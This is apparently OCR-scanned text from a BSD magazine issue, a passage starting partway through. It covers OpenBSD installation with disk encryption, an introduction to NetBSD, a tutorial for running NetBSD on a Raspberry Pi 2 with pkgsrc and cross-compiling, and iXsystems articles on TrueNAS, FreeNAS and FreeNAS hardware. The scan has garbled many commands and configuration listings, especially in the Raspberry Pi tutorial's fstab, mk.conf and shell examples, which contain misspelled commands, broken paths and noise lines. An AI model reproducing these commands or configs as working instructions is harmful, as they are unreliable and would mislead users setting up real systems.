ample 8192> -c C -| <RAID device> softraidO as below. 


CIJnstall, (UJpgrade, CAJutoinstall or (SJhell? S$ 
H fdisk -iy wdO 

riting MBR at offset 0. 

H disklabel —-E wdO 

Label editor (Center ’?’ for help at any prompt) 


[ala 
: [64] 
[209647611 1024M 


Cb] 
: [2104512] 
: [186603131] 512M 


cd] 
: [31486740] 
: [17616065] 
: CL4.2B5D] RAID 
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In order to come back to the normal installation process, we just need to type exit. 
b. Direct installation 


lf you do not need to encrypt, you can directly type ‘I’ for the straight installation. The first step is 
to give all the basic information as follows: 


° The keyboard layout. 

° The hostname. 

° The network. 

° The root and eventually a normal account (It is advisable to create one). 


. Which services to launch during the startup: ssh, X. 


After all of this, it is time to format the disks. In this example, we do not choose the default parti- 
tioning but the custom layout. If you followed the disk encrypting step, we need to type 'm' to set 
the mount point, so after confirming the offset, then size, already set via disklabel, we can set to 
/' then 'w' and ‘q'. Then we need to set the encrypted disk (would be for example sd1), so when 
the install script asks if we want to install or set another disk, we just need to type its name. 


Whether you chose to encrypt or not, the following step applies. 


We need to set the partitions, let's say ‘/usr'’, ‘/nome’ ... ‘/var', '/tmp' eventually ... if you did not en- 
crypt, you need to add a swap partition and a root one. With ‘a’, we add a partition, ‘d' to delete 
one, 'm' to set a mounting point to a specific partition, 'Z' to entirely delete the layout; in the end, 
'w' to write this layout and ‘q' to quit, which will effectively do the partitioning. 


Figure 3. Settimg the partitions. 
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Once it is done, the installation proposes finally to get the signed packages from either the CD (if 
you downloaded install58.iso) or via ftp/http, which in this case you might need to provide a mirror 
manually but generally the install script is able to find a reasonably fast one. 


Generally, for a simple install, it takes 
about 10/15 minutes in total, despite its 
“spartan” user interface, the installation 
is, aS you would realize, very effective. 


Once rebooted, we have a fully func- 
tional OpenBSD system. However, in or- 
der to have the third party software avail- 
able, you would need to set PKG_PATH 
environment variable to the closest mir- 
ror in the user's .profile file. 
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Figure 5. Setting PKG_PATH environment 


We now just have to type pkg_add <name of the package> for the installation. If the package has 
several “flavors” (ie with different options, for example, vim without X11 support, or with Python 
and Ruby support and so on ...), the list of these will be proposed. Usually, it is advised, for pro- 
duction use, to stick with release and binary packages, if necessary some errata fixes are pro- 
vided (please consult the page hitp://www.openbsd.org/errata58.html for more information). How- 
ever, if you prefer to have the last advanced features, you can either use the current snapshots 
provided regularly or compile the whole system from source; sources it is possible to get via 
CVS, the base source versioning on OpenBSD, for the source itself, xenocara (ie xorg with secu- 
rity fixes) and the ports. 


4. Conclusion 


As we saw, OpenBSD is able to be used as a daily driver, for business use and for personal use, 
as well. 


OpenBSD has the reputation to contain excellent quality man pages, hence it is strongly recom- 
mended to consult them carefully, it is very informational. Hopefully, that gives you the taste to 
give it a try! 
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NetBSD Introduction 


by Siju Oommen George 


The objective of this article is to introduce the NetBSD oper- 
ating system to people who are new to BSDs. The NetBSD 
project began as a result of frustration within the 386BSD de- 
veloper community with the pace and direction of the operat- 
ing system's development. 


The four founders of the NetBSD project, Chris Demetriou, Theo de Raadt, Adam Glass, and 
Charles Hannum, felt that a more open development model would benefit the project: one cen- 
tered on portable, clean and correct code. They aimed to produce a unified, multi-platform, 
production-quality, BSD-based operating system. The name "NetBSD" was suggested by de 
Raadt, based on the importance and growth of networks, such as the Internet at that time, the dis- 
tributed and collaborative nature of its development. 


Software Management 


pkgsrc (package source) is a package management system for NetBSD. It was forked from the 
FreeBSD ports collection in 1997 as the primary package management system for NetBSD. 
since then, it has evolved independently: in 1999, support for Solaris was added, later followed 
by support for other operating systems. DragonFlyBSD, from release 1.4 to 3.4, used pkgsrc as 
its official packaging system, now it uses its own native “dports”. MINIX 3 and the Dracolinux distri- 
bution both include pkgsrc in their main releases. Over 23 operating systems use pkgsrc as their 
package management system. “Portage” of Gentoo Linux & “Arch Build System” of Arch linux are 
examples of other package management systems akin to pkgsrc. 
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Portability to toasters. 


As the project's motto ("Of course it runs 
NetBSD" ) suggests, NetBSD has been 
ported to a large number of 32- and 64-bit ar- 
chitectures. These range from VAX minicom- 
puters 


Figure 3. NetBSD Toaster with the TS-7200 ARM9 
SBC 


As of now, NetBSD supports 57 hardware plat- 
Figure 1. VAX 11/785 forms including IA-32, Alpha, PowerPC,S- 
PARC, Raspberry pi 2, SPARC64 and Zaurus. 
The kernel and userland for all these plat- 
forms are built from a central unified source- 
code tree managed by CVS. 


to Pocket PC PDAs, 
oom “Webs 


Embedded Applications 


Being one of the most portable OSs in the 
world (with Debian), many of the supported 
hardware platforms are suited for embedded 
applications. Among the more popular proces- 
sor families for embedded systems are MIPS, 


Figure 2. NetBSD/hpcmips 5.1 on CASSIOPEIA Palm- PowerPC, ARM, Xscale and Super-H 
size PC 


ose 


o* 
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SMP 


NetBSD has supported SMP since the 
NetBSD 2.0 release in 2004. A scalable M2 
thread scheduler was implemented, though 
the old 4.4BSD scheduler still remains the de- 
fault but was modified to scale with SMP. 
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Threaded software interrupts were implemented to improve synchronization. The virtual memory 
system, memory allocator and trap handling were made MP safe. The file system framework, in- 
cluding the VFS and major file systems were modified to be MP safe. Since April 2008, the only 
subsystems running with a giant lock are the network protocols and most device drivers. 


Security 


NetBSD source tree is periodically analyzed by two separate code scanners to maintain and im- 
prove code quality: Coverity - a commercial code scanner, and Brainy - a private code scanner 
developed by a NetBSD developer. 


Several security features are available in NetBSD, including IPsec - for both IPv4 and IPv6, a file 
integrity system (Veriexec), a kernel authorization framework (kauth(9)), exploit mitigation fea- 
tures (PaX), disk encryption (CGD), and a variety of other internal kernel bug detection features 
such as KMEM REDZONE and KMEM SIZE. 


The NetBSD pkgsrc Security Team and package maintainers keep a list of known security vulner- 
abilities in packages which are (or have been) included in pkgsrc. The list is available from the 
NetBSD FTP site at: 


http://fto. NetBSD.org/pub/NetBSD/packages/vulns/pkg-vulnerabilities 


Through audit-packages, this list can be downloaded automatically, and a security audit of all 
packages installed on a system can take place. 


NetBSD comes with its own firewall NPF. NPF was primarily written by Mindaugas Rasiukevicius. 
NPF first appeared in the NetBSD 6.0 release in 2012. NPF is designed for high performance on 
SMP systems and for easy extensibility. It supports various forms of Network Address Translation 
(NAT), stateful packet inspection, tree and hash tables for IP sets, bytecode (BPF or n-code) for 
custom filter rules and other features. NPF has extension framework for supporting custom mod- 
ules. Features such as packet logging, traffic normalization, random blocking are provided as 
NPF extensions. 


Virtualization 


The Xen virtual-machine monitor has been supported in NetBSD since release 3.0. Any number 
of "guest OSes" (Dom) virtualized computers, with or without specific Xen/DomU support, can 
be run in parallel with the appropriate hardware resources. NetBSD 6 as a Dom0 has been bench- 
marked comparably to Linux, with better performance than Linux in some tests. 
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NEC Europe Ltd. established the Network Laboratories in Heidelberg, Germany in 1997, as 
NEC's third research facility in Europe. The Heidelberg labs focus on software-oriented research 
and development for the next generation Internet. 


User-space virtualization such as VirtualBox and QEMU are also supported on NetBSD. 


NetBSD 5.0 introduced the rump kernel, an architecture to run drivers in user-space by emulating 
kernel-space calls. This anykernel architecture allows adding support of NetBSD drivers to other 
kernel architectures, ranging from exokernels to monolithic kernels 


Storage 


NetBSD includes many enterprise features, like iSCSI, a journaling filesystem, logical volume 
management and the ZFS filesystem. The WAPBL journaling filesystem, an extension of the BSD 
FFS filesystem, was contributed by Wasabi Systems in 2008. It also includes CHFS Flash mem- 
ory filesystem, the first open source Flash-specific file system written for NetBSD. A variety of "for- 
eign" disk filesystem formats are also supported in NetBSD, including FAT, NTFS, Linux ext2fs, 
Mac OS X UFS, RISC OS FileCore/ADFS, AmigaOS Fast File System, IRIX EFS and many more 
through FUSE. Licensing 


All of the NetBSD kernel and most of the core userland source code is released under the terms 
of the BSD License (two, three, and four-clause variants). This essentially allows everyone to 
use, modify, redistribute or sell it as they wish, as long as they do not remove the copyright notice 
and license text (the four-clause variants also include terms relating to publicity material). Thus, 
the development of products based on NetBSD is possible without having to make modifications 
to the source code public. In contrast, the GPL, which does not apply to NetBSD, stipulates that 
changes to source code of a product must be released to the product recipient when products de- 
rived from those changes are released. 


As for packages, the installed software licenses may be controlled by modifying the list of allowed 
licenses in the pkgsrc configuration file. 


Research Usage 


NASA Lewis Research Center - Satellite Networks and Architectures Branch use NetBSD al- 
most exclusively in their investigation of TCP for use in satellite networks. 


KAME project - A research group for implementing IPv6, IPsec and other recent TCP/IP related 
technologies into BSD UNIX kernels, under BSD license. 
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SAMS-II Project - Space Acceleration Measurement System II. NASA will be measuring the micro- 
gravity environment on the International Space Station using a distributed system, consisting of 
NetBSD. 


Who uses NetBSD? 


Arcapos point-of-sale terminals are known for their excellent user friendliness and extreme robust- 
ness. The (commercial) arcapos applications (point-of-sale, infokiosks) are 100 percent made in 
switzerland. NetBSD is not only used as the operating system of choice for arcapos, but also has 
been extended by the arcapos team to be the best open-source platform available for point-of- 
sale and related applications. 


CentreCOM WR54-ID by Allied Telesys, Co is a wavelan router based on NetBSD. 


The Champaign-Urbana Community Wireless Network releases an open source wireless sys- 
tem based on NetBSD. 


fdgw is a one floppy version of NetBSD/i386. It can run on old machines without HDD. You can 
use it as a small router, natbox or ADSL router. It is a minimal operating system. 


g4u is a NetBSD-based boot floppy/CD-ROM that allows easy cloning of PC hard disks to deploy 
a common setup on a number of PCs using FTP. 


Precedence Technologies (a UK-based company) offers thin-client software (ThinIT) and accom- 
panying hardware based on NetBSD. ThinlT provides access to Microsoft RDP, Citrix ICA, web- 
browsing, DVD playback, video streaming, ssh and VNC hardware all in a centrally-managed way 
with a tiny footprint. NetManager is a general-purpose modular firewall, email, web, VPN and 
proxy server based on NetBSD with easy-to-use web-based management. It also offers web- 
based central management of ThinlT. 


The Operating System made by QNX Software Systems Ltd. uses several components of the 
NetBSD System. 


Dynarc makes a series of routers for optical IP networks. The base for their software is NetBSD 
(mostly kernel). 


endgadget's palm-sized NEC UNIVERGE WNX Server measures only 3.79 x 2.5/7 x 2 inches 
(96.4 x 65.4 x 50./mm), and can easily be considered palm-sized. It runs NetBSD, features video 
in/out, audio in/out, 100Base-TX ethernet, two CF card slots, and offers a battery life of three 
hours. NEC intends the server to be used as a sort of mobile gateway for connecting your phone 
to video cameras in an office, for example. 
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BMF CORPORATION produces EZF-1500E, a development kit for embedded finger print sys- 
tems. The kit includes an ARMY based board and a development environment based on NetBSD 
1.6. Also, source code of the finger print sensor driver, a finger print matching engine library and 
Sample programs, and circuit diagrams are available. 


Dell Networking OS 9 is powered by NetBSD. The NetBSD kernel provides a stable operating 
system and performs efficient resource management via the HAL architecture, allowing it to de- 
liver superior levels of concurrency, memory allocation and process scheduling. All other applica- 
tions run as independent and modular processes in their own protected memory space. 


There are many more to all the lists but are not included due to possible space constraint. 
If you would like to try this Operating System you can start reading the documentation from 
http://www.netbsd.org/docs/guide/en/netbsd.html 


Support for the Operating System can be requested from netbsd-users and pkgsrc-users. Direc- 
tions to join the mailing lists are provided in the pages 


http://www.netbsd.org/mailinglists/ 
http://www.netbsd.org/mailinglists/#descriptions-of-mailing-lists 


For mailing list archives you may go to http://marc.info/ 


About the Author: 
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f LinkedIn group: AllSec Group 
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NetBSD on Your Raspberry PI 2 


by Carlos Neira 


If you haven’t heard of this mini computer, well you are in 
for a surprise. The Raspberry Pi 2 Model B is the second 
generation Raspberry Pi A. The Raspberry PI 2 ts the size of 
a credit card and comes with ARM v7 Cortex running at 900 
Mhz with 1GB of RAM. That means you could install these 
operating systems on it: NetBSD, FreeBSD, RISC OS, Plang, 
AROS, Linux and Windows 10 loT Core. 


The current specs for this machine are: 
A 900MHz quad-core ARM Cortex-A/7 CPU 
1GB RAM 
Like the (Pi 1) Model B+, it also has: 
4 USB ports 
40 GPIO pins 
Full HDMI port 
Ethernet port 
Combined 3.5mm audio jack and composite video 
Camera interface (CSI) 
Display interface (DSI) 
Micro SD card slot 
VideoCore IV 3D graphics core 
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All that for a price of around $35 USD, not bad. This machine has become a really popular plat- 
form, according to Wikipedia: 


“As of 8 June 2015, about five to six million Raspberry Pis have been sold. While already the fast- 
est selling British personal computer, it has also shipped the second largest number of units be- 
hind the Amstrad PCW, the "Personal Computer Word-processor", which sold eight million.” 


(https://en.wikipedia.org/wiki/Raspberry_ Pi) 
What is NetBSD? 


Acording to the official website https://www.netbsd.orq/ : 


“NetBSD is a free, fast, secure, and highly portable Unix-like Open Source operating system. It is 
available for many platforms, from 64-bit x86 servers and PC desktop systems to embedded 
ARM and MIPS based devices. Its clean design and advanced features make it excellent in both 
production and research environments, and it is user-supported with complete source. Many ap- 
plications are easily available through pkgsrc, the NetBSD Packages Collection.” 


Why choose NetBSD for your Raspberry PI’? 


Here are a couple of reasons hittp://www.luke.maurits.id.au/writing/why-i-use-netosd.html 


My reasons were mostly that all is working on RPI 2, and its a BSD system that is more familiar 
to my running on my RPI 2. 


What is working on NetBSD 7’? 
° multi-user boot with root on SD card 
° serial or graphics console (with EDID query / parsing) 
° DMA controller driver and SDHC (4) support 


° Audio: works. man page missing 


° I*C: works, could use enhancements, man page 
° GPIO 
. RNG 


° SPI: could use enhancements, man page 


° GPU (VCHIQ) - 3D and video decode. man page missing 
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Installing NetBSD in the Raspberry Pi 2 
This is really straightforward, you just need to follow these steps: 
1. Flash your SD card with a NetBSD image 


The Raspberry Pi port is still not part of the stable release, we will have to run NetBSD-current. 
Pre-built images can be downloaded here. 


Let's fetch an image, and create the bootable media using this image. 


http://nyftp.netbsd.org/pub/NetBSD-daily/HEAD/201511111600Z/evbarm-earmv /hf/binary/gzimg/a 
rmv/.img.gz 


According to the NetBSD wiki, these images are optimized for the Raspberry PI 2. 
https://wiki.netbsd.org/ports/evbarm/raspberry_pi/ 

Now let’s write the image to the SD Card. 

For example, in FreeBSD, you will need to do this to write the image to your SD Card: 


#wget 
http://nyftp.netbsd.org/pub/NetBSD-daily/HEAD/201511111600Z/evbarm-earmv /hf/binary/gzimg/a 
rmv/.img.gz 


#gunzip armv/.img.gz 
#dd if=armv/.img of=/dev/da0 bs=4M 


Now, put the SD card on your Raspberry PI2 and boot and you should see the usual NetBSD 
boot process messages. 


Figure 1. NetBSD boot process messages. 
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Just login as root in this image, it does not have a password, so it is better to assign one. 


Now type to change your password. 


#oasswd 


Let's add a user and incorporate him/her into the wheel group 


tiuseradd -m -G wheel <username> 


Now set a password for this user 


#passwd username 


Keeping time synchronized 


As the Raspberry Pi does not include a hardware clock on board, we will need to use NTP to 
keep the time synchronized. First locate your timezone in /usr/share/zoneinfo and symlink it to 
/etc/localtime. 


For example, I'm located in Chile Continental, so | need to symlink the Continental timezone un- 
der the Chile timezone folder 


Icey 5S) ste) Sines / vaca.) Cla Iva CoiveaigeinceL eee tees ienime 


After adding the ntpdate directive in rc.conf: 


Add this line to /etc/rc.conf to make the ntpdate service start at boot. Using echo Is faster. 


echo "ntpdate=YES" >> /etc/rc.conf 


Now start ntpdate manually because if we don't setup our date and time properly, programs like 
make will not work properly. 


Jetc/rce.d/ntpdate start 
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Installing software using pkgsrc 


To fetch and unpack the pkgsrc current branch, execute on your RPI2 (Raspberry PI2): 


# ftp ftp://ftp.NetBSD.org/pub/pkgsrc/current/pkgsrc.tar.gz 
Te) enexXes en OKC Se Cte ee) Zu Cane US Ic 


lf your transfer fails for any reason, just resume it from where you left it. Pass the -R flag (resume) 
to the ftp program. 


ie Oe I RICO clon NMC SIs Oucey oilley Slepsicey @Ulcieainie Tole sie 4 Ieee 4 Os 


Now to start building, we need to go to the folder of the application we need to build and type: 


make install 


If you want to create a binary package so you could distribute to your friends and save them valu- 
able time (as building a package takes time, hours actually, depending on the package. We are 
on a raspberry pi remember?), just use the package option when building. 


# make install package 


The packages are created in /usr/pkgsrc/packages/All ready for you and handy to make a 
reinstall/install on multiple raspberry pies or share with your mates. 


Also, if you could check in here, if there is a package you need and will save you some time from 
compiling it yourself. 
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fip:/ftp_netbsd.org/pub/pkgsrc/packages/NetBSD/earmv7hfi7.0 2015Q3/All 


In your shell as root, type the following: 

# oxport PKG_PATH@ftp://ttp.netbsd.org/pub/pkgsre/packages/NetSSD/earmv7ht/7.0_201503/AlL 
Acc this line to your ~/.profile. 

Now you could start installing, for example, the rsync package. 


pkg_add -v rsync 


Moving / from SD to USB drive 


Every time there is a write on our SD Card, its life shorens, so it is better to move al! our / partition to 
a more trusty device, in this case a USB disk drive (I'm using a 16GB thumb Crive that does not 
consume extra juice from my RPI2). 

The USB drives are usually Cesignated as sc0. 


THIS WILL ERASE ALL YOUR DATA. As root, execute: 
# fdisk -u /devi/rsd0d 

choose sysic for NetBSD is 169, just hit enter on the rest. 
# disklabel -i -I sdO 

partition> i 


Pilesystem type [?] [MSDOS]: 4.2BSD 
Start offset ('x' to start after partition ‘x') [0c, Os, OM): 


[RETURN] 
Partition size ('$° for all remaining) [(61260c, 15682559s, 7657.5M]: $ 
partition> W 

Label disk [n]? y 

Label written 

partition> Q 


Finally, create the new filesystem. 


# newfs /dev/rsdOi 


Mocify your /etc/fstab, comment or erase the IdOa (SD card) entry anc add your USB drive panition as 
/ 


# NetBSD /etc/fstab 

# See /usr/share/examples/fstab/ for more examples. 
#dev/ic0a / fis fw,noatime 11 
idevisc0i i fis mwnoatime 11 
fdevicOb none swap sw 00 
idevicde ‘boot msdos rw 11 

kernfs ‘kern kernfs tw 

ptyfs idevipts ptyfs rw 

procfs /proc procfs rw 

tmpfs ‘var/snhm tmpfs mw,-m1777,-sram%25 


Now we need to copy our / contents to the new /. Mount the USB drive partition to /mnt to stan 
replicating the files. 


# mount -t ffs /dev/sdOi /mnt 
Now let's copy the files 
# rsync -axv / /mnt 


When rsync finishes, we finally need to modify /boot/cmdline.txt file to point to our new / panition 


#root=ld0a console=fb 

root=sd0i console=fb 

#fb=1280x1024 # to select a mode, otherwise try EDID 
#fb=disable # to disable fb completely 

Now reboot 

# reboot 


Saving time cross compiling 


A lot of software is available through pkgsrc, so let's start building it. 
For example, as root, type: 


# cd /usr/pkgsrc/<some category>/<some application> && make package 

Now, if you are compiling this on your P! 2, take a walk, read a book, go to sleep, etc. Some packages 
will take some time, even days! Now, let's save some time and learn about cross-compiling. 

A cross-compiler emits coce for a platform that is different than the one that the compiler is actually 
running. 

For this we need a more powerful machine that we could use to build our packages much faster than 
the Pl. The machine that will build the packages for the PI will need to be running NetBSD, in this 
case NetBSD 7.0_RC3, you need to run the same NetBSD version on your RPI2 and your cross 
building nost for this to work. 

The procedure is really straightforward, most instructions are in here: 
http./ftp_netbsd.org/pub/pkgsrc/current/pkgsrc/doc/HOWT O-use-crosscompile 

We will follow this but we will modify the steps a little. 

First things first, to dDuild a cross-compiler able to produce ARM v7 code, we need to builc it, so let's 


fetch the NetBSD source code. (hitps://www.netbsd org/docs/quide/en/chap-fetch.ntml). 
As root, type the following: 


# cd /usr 


# export CVSROOT="anoncvs@anoncvs.NetBSD. org: /cvsroot”™ 
# cvs checkout -r netbsd-7-0-0-RELEASE -P src 


Let's builc our cross-compiler. As root, type: 
# cd /usr && mkdir obj-evbarm && cd /usr/sre 
#./build.sh -O0 /usr/obj-evbarm -T /usr/tools -m evbearmv7hf-el tools 
What do these flags co? 
-O /usriobj-evbarm 


We have created the cirectory /usr/obj-evbarm which is where our cross-compiler and tools will be 
created. 


-m evbearmv7hf-el 


Specify the architecture we plan to build, if you take a look at the build.sh script, you will see all the 
architectures available. 


-T /usritools 

Where are the tools we will use to build? 

tools 

Builc the tools needed to build the distribution anc, in our case, needed to cross compile. 

This will take some time, depencing on your computer. When that is finishec, you will need to execute 
the following as root: 

#./build.sh -O /usr/obj-evbarm -T /usr/tools -m evbearmv7hf-el distribution 
This will take longer than the first step. After that, you should see something like this. Take note, as 


you will neec this information to create your mk.conf file for pkgsrc. 


Summary of results: 


build.sm command: Jbuild_sh -u -O /usrfobj-evbarm -T /usr/tools -m evbearmy7hf-e! distribution 


build.sh stared: Wecd Nov 25 03:58:50 UTC 2015 


NetBSD version: 7.0 
MACHINE: evbarm 
MACHINE_ARCH: earmvy?hf 


Build platform: NetBSO 7.0_RC3 i386 


HOST_SH: foinfsh 

MAKECOMF file: fetcimk.conf (File not found} 
TOOLDIR path: fusritools 

DESTDIR path: fusnobj-evbarmdestdirevbarm 
RELEASEDIR path: fusriobj-evbarmreleasedir 


Updated makewrapper: /usr'tools/bin/nomake-evbearmv7hf-e! 
Successful make distribution 
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When both builcing steps have completed, we need to modify/create our /etc/mk.conf to specify that 
we want to cross compile the pkgsrc packages we neec, as specified in the document, we will make 
some changes as every install is cifferent. 


# Cross-compile by cefaull. 
* 
# XXX This currently can’ be set to “yos' an the command line, 
# which is a bug 
USE CROSS COMPILE?= yes 


# This is a kludge “or cross ibicol. 


3 
# XXX Should not need this. 
CROSSSASE- S{LOCALBASE}(cross SITARGET ARCH -US/MACHINE ARCH) 


# #lomrpiy(USE CROSS COMPILE:M[,V][cE[sS]) 
# Specify the machine architecture of target packages. 
* 
# XXX This currently can’ be set on the command Ine, which is a 
# bug. 
MACHINE ARCH= carmy? he 


# Point pkgsrc at the Ne:BSO tooldir and desicir. 


# 

# XXX There is no obvious variable that is set 29 amdG4 so thal we 

# could use 

# 

# TCOLDIR= fusrodjHookir SfOPSYS).$/OS VERSION) SINATIVE xyz) 
# 


# MACHINE is amd64 bus, since it's not NATIVE_ xyz, it’s wrong. 

# NATIVE MACHINE ARCH ic x86_G4, not amdG4 

TOOL3IR= ‘usritoals 

CROSS DESTOIR- ‘usrod) evbanm/cestdr.cvdarm 

# ut target work and packages in separate directories. [You might 

# use OBL MACHINE=yes or WRAOBJOIR=mpiwok $/MACHINE ARCH] instoad 
# for the work directories.) 


F 4 
# XXX Shauld not need shis. 
PACKAGES= S/>KGSRCOIRVpackages.SIMACHINE ARCH} 
WRDIR_ BASENAME= work S/MACHINE ARCH] 
# ondif 


ACCEPTASLE LICENSES+= gnu agp! v3 
ACCEPTASLE LICENSES+= vim license 


Now we need to install the cross-libtool 


$ cd /use/pkgsre/crossilib:col base 
$ make package 
$ pkg add .m evbarmv?hf /usr'pkgsrc/packages.cvbarmvy7hiAll/cross. |Bloal base carmw7hi.2.4.2nb2.1oz 


All the packages we cross compiled will be locatec in that cirectory (/usr/pkgsrc/packages.evbarm hf! 
All’). 

Now we could stan duilding our packages targeting our Raspberry PI 2. 

As usual, just go to the folder where the package you need resides and execute make package as 
neeced, for example. 


Let's build vemacs for our Raspberry PI 2. 


cd /usr/pkgsrc/editors/uemacs && make package 


Then we coulc just copy the package to our P! and install it there: 


# scp uemacs-4.0nb2.tgz cnb@192.168.1.112:-/ 
The authenticity of host ‘'192.168.1.112 (192.168.1.112)' can't be 
established. 
ECDSA key fingerprint is SHA256:O0JL8aWq 
+hMqOwj VovVI182+XrDmsGwseteKLw9WPitrc. 
Are you sure you want to continue connecting (yes/no)? yes 
Warning: Permanently added '192.168.1.112' 
hosts. 
Password for cnb@armv7: 
uemacs-4.Onb2.tgz 

100% 125KB 124.9KB/s 124.9KB/s 00:00 
u 
Then, in our Raspberry PI 2, just install uemacs 


armv7# pkg_add -v uemacs-4.Onb2.tgz 


pkg_add: Warning: package “uemacs-4.0nb2' was built for a platform: 
pkg_add: NetBSD/earmv7hf 7.0 RC3 (pkg) vs. NetBSD/earmv7hf 7.99.21 (this 
host) 

bin/uemacs 


share/uemacs/ .emacserc 
share/uemacs/bpage.cmd 
share/uemacs/chklist.ms 
share/uemacs/cpage.cmd 
share/uemacs/cua.cmd 
share/uemacs/dev.cmd 
share/uemacs/ehelp.cmd 
share/uemacs/ehelpl.txt 
share/uemacs/ehelp2.txt 
share/uemacs/epage.cmd 
share/uemacs/error.cmd 
share/uemacs/ filter.cmd 
share/uemacs/ lpage.cmd 
share/uemacs/mdi.cmd 
share/uemacs/mewin.cmd 
share/uemacs/newpage.cmd 
share/uemacs/opage.cmd 
share/uemacs/ppage.cmd 
share/uemacs/shell.cmd 
share/uemacs/wpage.cmd 
Package uemacs-4.Onb2 registered in /var/db/pkg/uemacs-4.Onb2 


Now let's test if that worked. 


armv?7# uemacs 


ney 
mxt Ww } 
¥ t ‘ rime Th key 


Mic roEMACS 4.66 (] Function Keys 


sees MicroEMACS 4.66 


21:57) &:1 C:6 () = 


That's great! 


Now you are able to cross compile your own packages for the ARM v7 architecture :) 
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What’s the Difference Between True- 
NAS and FreeNAS? 


by Brett Davis 


“What’s the difference between TrueNAS and FreeNAS? Is 
TrueNAS just FreeNAS installed on a server?” If you look at 
the software feature list, there aren’t a ton of differences. So 
really....what’s the difference? 


1. The first difference is the software We make FreeNAS for when storage is 
delivery method: TrueNAS is a purpose-built non-critical. 
storage appliance while FreeNAS is freely- 
downloadable software that requires the user 
to understand storage well enough to select 
the correct hardware that is appropriate for 
their application. 


There are certainly many storage applications 
that don't require professional support. Applica- 
tions like home storage, simple office file serv- 
ers, tertiary backups, home streaming media 
servers, scratch space, storage experimenta- 


2. TrueNAS is commercially- tion, or any other application where data is fun- 
supported, while FreeNAS is community- gible; FreeNAS can be the perfect solution for 
Supported. all of them. 


3. There are performance and usability We make TrueNAS for when storage is criti- 


optimizations in TrueNAS that are specific to cal. 
the hardware we use and therefore arent in- 
cluded with FreeNAS. Storage downtime can equal an instant loss of 
revenue, making reliable storage a painstak- 
4. High-Availability (failover) is ing process — a process that requires careful 
hardware-dependent and only available in Tru- consideration, deep hardware and storage 
eNAS. knowledge, and countless hours of testing — 


certainly eons more difficult than the Software 
Defined Storage crowd would want you to be- 
lieve. 


But, perhaps more critical to understand than 
the “what” is the “why’: 


8/ 
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It took us nearly two years to select, design, 
test, and qualify the myriad hardware compo- 
nents that go into TrueNAS, which is a 
purpose-built appliance — meaning software 
coupled with custom hardware — designed 
for its one specific application: critical storage. 


Compared to a user-built system that your 


software vendor knows nothing about, the ap- 


pliance platform is inherently easier to support 
when things don't go your way, because your 
software vendor is your hardware vendor as 
well. And, when storage is this important to 


your business, it's imperative to have a Sup- 


port Team at arm's length who can resolve 
any issue that may arise without having to first 


wrap their heads around the hardware plat- 


form you ve built. 


We make FreeNAS for Open Source flexibil- 


ity. 


For those that have the expertise and the 


spare time to build and support their own solu- 


tions, or for those that want to tinker and learn 
about storage, FreeNAS is freely-available 
and unencumbered by license restrictions. 


The FreeNAS Project has a mature commu- 


nity and a team of developers dedicated to 


providing the best (open-source) software de- 


fined network file storage solution in the 
world. All we ask in return is that you enjoy 
the software and contribute when and where 
you can, which can be as simple as providing 


feedback, filing bugs, and making feature re- 


quests, or as involved as helping us write 
code. 


We make TrueNAS for enterprise stability. 
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Where FreeNAS is the bleeding edge, True- 
NAS is the stable handle. FreeNAS is where 
technologies are tested and refined; therefore 
the software undergoes an often rapid and fre- 
quent release cycle. TrueNAS, by contrast, 
contains only the most stable and vetted 
code, keeping software updates to a minimum 
and the release cycle methodical. 


We make FreeNAS for people who want to 
“DIY” 


some folks like to do it themselves. Some 
folks only get satisfaction when building things 
on their own. Some folks don’t mind downtime 
when there's an issue and enjoy perusing the 
FreeNAS forums for help. Some folks have 
limited budgets yet still want powerful storage 
software. And, some folks are storage experts 
themselves. You're welcome, guys :) 


We make TrueNAS because businesses 
don’t want to “DIY” 


Instead of buying a fleet of delivery trucks, | 
Suppose we could purchase all the compo- 
nents separately, build the trucks ourselves, 
and fix them when things break. But, we're 
not a car dealership, were a storage com- 
pany. Wed probably save money up front on 
the cost of the bare parts but would certainly 
come out way behind with the time spent figur- 
ing out how to put them all together and build 
a functioning car, let alone the costs to main- 
tain it! 
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Most businesses don't have the time, avail- 
able hardware, or internal support expertise 
for a do-it- yourself storage solution — they're 
busy focused on their own missions and busi- 
ness models. But, with a 100% software solu- 
tion, you must build the server yourself. If 
there is a problem with the server hardware, 
you cant look to the software vendor for sup- 
port, and vice-versa if you have hardware 
problems. With TrueNAS, you get one throat 
to choke....ours :) 


We make FreeNAS because many are turn- 
ing to virtualization. 


FreeNAS is known to work well with all major 
virtualization platforms, but due to the nature 
of the decoupled hardware, we aren't able to 
Officially certify the software with the virtualiza- 
tion vendors. Therefore, tf something goes 
haywire, the user cannot turn to the virtualiza- 
tion vendor for assistance and instead must 
rely on the FreeNAS community. 


We make TrueNAS because many are turn- 
ing to virtualization...and need Support. 


With a software-only solution you must verify 
that every component is on the virtualization 


Brett Davis 
iXsystems Executive Vice President 
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vendors’ compatibility list and when your con- 
figuration changes (such as upgrading to a 
new network card) you need to validate the 
configuration again. Most businesses can't af- 
ford the risk, so TrueNAS is officially certified 
to support Citrix XenServer, VMware ESXi, 
and Microsoft Hyper-V. 


FreeNAS and TrueNAS both have their 
rightful places. 


FreeNAS is the world’s most popular software 
defined storage OS, with more downloads 
and installs than any other storage software 
on the planet. The sheer magnitude of interest 
speaks volumes about its myriad applications. 
And, as its enterprise counterpart, TrueNAS 
has the performance, high-availability, func- 
tionality, and professional software support 
that mission-critical storage applications re- 
quire. 
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A Complete Guide to FreeNAS Hard- 
ware Design: Purpose and Best 
Practices 


by Josh Paetzel 


This document draws on years of experience with FreeNAS, 
ZFS, and the OS that lives underneath FreeNAS, FreeBSD. 
Its purpose is to give guidance on intelligently selecting 
hardware for use with the FreeNAS storage operating sys- 
tem, taking the complexity of its myriad uses into account, 
as well as providing some insight into both pathological and 
optimal configurations for ZFS and FreeNAS. 


A guide to selecting and building FreeNAS A word about software defined storage: 
hardware, written by the FreeNAS Team, is 
long past overdue by now. For that, we apolo- 
gize. The issue was the depth and complexity 
of the subject, as youll see by the extensive 
nature of this four part guide, due to the vari- 
ety of ways FreeNAS can be utilized. There is 
no “one-size-fits-all” hardware recipe. Instead, 
there is a wealth of hardware available, with 
various levels of compatibility with FreeNAS, 
and there are many things to take into ac- 
count beyond the basic components, from use 
case and application to performance, reliabil- 
ity, redundancy, capacity, budget, need for 
support, etc. 


FreeNAS is an implementation of Software De- 
fined Storage; although software and hard- 
ware are both required to create a functional 
system, they are decoupled from one another. 
We develop and provide the software and 
leave the hardware selection to the user. Im- 
